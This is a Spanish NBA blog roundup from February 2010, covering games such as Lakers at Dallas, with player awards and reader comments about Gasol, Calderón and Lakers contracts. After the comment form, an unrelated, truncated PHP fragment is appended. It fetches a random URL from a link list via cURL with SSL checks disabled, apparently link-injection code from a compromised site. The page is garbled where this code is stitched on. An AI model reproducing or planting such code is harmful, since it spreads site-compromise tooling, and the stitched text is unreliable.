La Crónica (24/02/2010)

25 de February de 2010 por TheDeerHunter

Duelo por todo lo alto en el Oeste. Los Lakers visitaban Dallas la noche siguiente a su apurada victoria en Memphis. Los Mavs no contaban con Butler… y los amarillos, por su parte, tampoco podían contar con la inestimable presencia de… ejem… Vujacic. Hay quien asegura que los Mavs ahora mismo son la plantilla más profunda de la conferencia y es que ante la baja mencionada todavía se pueden permitir sacar a Deshawn Stevenson a apretarle las clavijas a Kobe. Una de las causas por las que el crack angelino firmó una actuación discreta. En esta ocasión Gasol también sufrió el “back to back” y a un Nowitzki inconmensurable. Sus 31 puntos y los 30 de Terry desequilibraron la balanza hacia el lado local. Con todo el partido resultó igualadísimo y emocionante.

Otro choque de alto standing en el oeste fue el Oklahoma@San Antonio. La defensa Popovic logró detener la impresionante racha anotadora de Durant mientras que Ginobili recordó al de sus mejores tardes cuajando un partido inmenso desde el banquillo. Un partido muy completo de los locales que provocó la 2ª derrota consecutiva de los Thunder. Lo difícil no es llegar, sino mantenerse.

Jornada favorable al Oeste en los duelos interconferencias. Los Blazers fundieron los plomos a los Raptors; Marc y Randolph volvieron a parecerse a la mejor pareja interior del campeonato tumbando a unos combativos Wizards; los Suns en la vuelta de Nash no tuvieron demasiados problemas contra Sixers; Deron-Boozer junto a Korver dieron buena cuenta de los Bobcats… y los Clippers jugaron a un gran nivel en su trabajada victoria contra los Pistons.

Por su parte, Dwight Howard batió el récord de Shaq en dobles-dobles consecutivos con Orlando machacando a los Rockets. Los Hawks tuvieron que tirar del mejor Josh Smith de la temporada para controlar a los Wolves y los Bucks consolidaron plaza de playoffs destrozando a los Hornets, con otra actuación sensacional de Bogut.

Finalmente los Bulls liquidaron a los Pacers con partidazo de la pareja Rose-Deng.

PREMIOS

MVP: Aspirantes para dar y tomar, trios enteros (Nowitzki, Terry y Kidd), parejas (Deng y Rose) e individuales. Josh Smith cuajó una de esas completas actuaciones a las nos tiene bastante acostumbrados con 27 puntos, 10 rebotes, 5 asistencias y 2 tapones, Dwight Howard se fue hasta los 30 puntos y 16 rebotes con 11 de 11 en tiros de campo y Carlos Boozer consiguió la misma cantidad de rebotes pero 3 puntitos más.

Rookie: Hoy han destacado 3 jugadores que pueden estar jugándose la inclusión en el mejor quinteto rookie de la temporada. Taj Gibson puede tener algo de ventaja por aquello de ser el único hombre alto que está destacando en su primer año. Anoche, 14 puntos y 11 rebotes más a la saca. Y en New Orleans, la pareja de todos los días, Darren Collison (22-3-9) y Marcus Thorton (25-5-1).

Sorpresa: A de haber problemas en los Wolves para que Ryan Hollins sea titular a pesar del buen partido de anoche (18 puntos). En Portland, despertó Rudy Fernandez anotando 17 puntos aderezados con 7 rebotes y 3 asistencias. Y en los Clippers (por si alguien le había perdido la pista), Drew Gooden se fue a los 20 puntos, 13 rebotes y 4 asistencias.

Decepción: Ni Mike Conley ni Antonio McDyess ni Luis Scola ni DJ Augustine han sido capaces de anotar una sola canasta en sus partidos correspondientes. Y todos tiraron 5 o 6 tiros…

Esfuerzo en vano: Completas actuaciones de Hedo Turkoglu (24-4-3), Aaron Brooks (24-6-8) y Lamar Odom (21-7-5), todas premiadas con el amargo sabor de la derrota.

Comenta

9 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    No se si pensabais que iba a dejar pasar esta ocasión, jeje, mojada de oreja de Dirk a Pau.

    Bogut por fin esta haciendo lo que debe, ojala le dure.

      Citar

  2. TheDeerHunter dice:
    #2

    No lo pensábamos. De hecho lo esperaba. jejeje

    Bogut está jugando muy bien todo el año. Y parece que durará, porque apuesto que van a meterse en postemporada ya mismo.

      Citar

  3. TheDeerHunter dice:
    #3

    De todas formas no sé si te has fijado que a los Mavs tampoco le han ido demasiado bien los back to back esta temporada… algo influirá, digo yo.

      Citar

  4. kantonyo dice:
    #4

    Tienes todo el derecho Viva_Dirk.

    El aleman barrió de la pista a Pau Gasol, aunque más aún a Lamar Odom cuando Phil cambió de parejas. Malísimo partido de Gasol, se le escapaban todos los balones. Si hay algo que no soporto de Pau, son sus gritos en el rebote y sus quejas incluso cuando está claro que no lleva razón.

      Citar

  5. TheDeerHunter dice:
    #5

    Bueno Kantonyo, tienes más razón que un santo.
    Pero es que eso tiene una sencilla explicación… y es que los árbitros son tan rematadamente malos que eso funciona muy bien en la NBA.
    De hecho, opino que Gasol hace ahora tanto numeraco porque le ha pillado el tranquillo más que nunca a ese tipo de recursos. No es el primero ni el último. Sin ir más lejos Kobe Bryant.

    También me acuerdo hace no mucho que lo corrían a boinazos en Boston (y en muchas otras canchas) y se le tachaba de blando y de “sang d’orxata”. Prefiero que lloriquee como una niña si así los árbitros van a respetarle un poco más.

      Citar

  6. Love Denise dice:
    #6

    ¿Se puede criticar la temporada que está haciendo Calderón este año?, ó me saldreis con que Daimiel puso en su blog que si menospreciamos y criticamos a los españoles, bla, bla bla ?

    Qué pena desperdiciar 17 millones de dólares en esto (Walton, Vujacic, Morrison y Farmar).

    Jamás podía haberme imaginado que Zach-Marc se convertirían en una de las parejas interiores más dominantes del campeonato.

      Citar

  7. kantonyo dice:
    #7

    Love Denise, aquí se puede decir lo que se quiera. Pero el aliciente de un blog, es la discrepancia. Así que si escribes tu opinión, sólo puede esperar que los demas te debatan con sus opiniones. Peor sería que nadie contestara a nadie, daría la sensación de que no nos leemos los unos a los otros…

    Pero yo no creo recordar que nadie hablara de que Sergio Rodriguez fuera español, se le defiende por su talento y sus condiciones jugando al baloncesto.

    La temporada de Calderón es complicada. se ha unido su peor año, con sus lesiones y con el buen hacer de Jack. Eso ha provocado su justa suplencia y ha perdido protagonismo en el equipo. Nadie más que él podrá ganarse de nuevo la titularidad. Con partidos como el de ayer, va a ser díficil.

      Citar

  8. TheDeerHunter dice:
    #8

    juer love denise… cualquiera que te lea va a pensar que somos fundamentalistas hispánicos (o daimiel)

    la temporada de Calderón no es la mejor, por supuesto… pero entre la temporada donde firmó su contrataco (11 ptos – 8 asistencias) y ésta con tantos problemas (11ptos 6 asistencias) la diferencia no debería de ser en ningún caso ponerle a caldo… (que ya te veo venir)

    de Farmar no creo que haya ni un sólo Laker que esté este año a disgusto de su rendimiento con relación a lo que cobra… y con Walton el problema es que no lo hemos tenido (ya nos hubiera gustado, ya)
    Morrison… su valor era expiring originalmente… por desgracia seguirá siendo expiring, que ya les gustaría pillarlo a otros.

    El problema es el puto Vujacic.

      Citar

  9. Love Denise dice:
    #9

    pienso que el contrato de Walton es demasiado alto para lo que aporta y lo limitado que es. Recordad que aín le queda 20 millones de dólares por cobrar en los próximos cuatro años, es algo “invendible” al resto de equipos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>